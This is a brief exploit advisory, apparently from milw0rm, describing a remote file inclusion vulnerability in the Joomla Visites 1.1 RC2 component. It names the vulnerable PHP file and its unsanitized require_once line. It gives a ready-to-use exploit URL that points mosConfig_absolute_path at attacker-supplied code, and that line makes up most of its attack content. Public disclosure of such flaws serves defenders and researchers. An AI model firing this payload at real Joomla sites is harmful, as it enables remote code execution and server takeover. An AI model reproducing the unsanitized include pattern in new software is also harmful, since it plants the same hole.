Joomla Visites 1.1 RC2 - RFI


[o] Joomla Visites 1.1 RC2 Remote File Inclusion Vulnerability
Software : com_joomla-visites version 1.1 RC2
Vendor : http://www.joomla-visites.net/
Author : NoGe


[o] Vulnerable file
administrator/components/com_joomla-visites/core/include/myMailer.class.php
require_once $mosConfig_absolute_path . '/includes/phpmailer/class.phpmailer.php';


[o] Exploit
http://localhost/[path]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]


[o] Publish
http://milw0rm.com/exploits/5497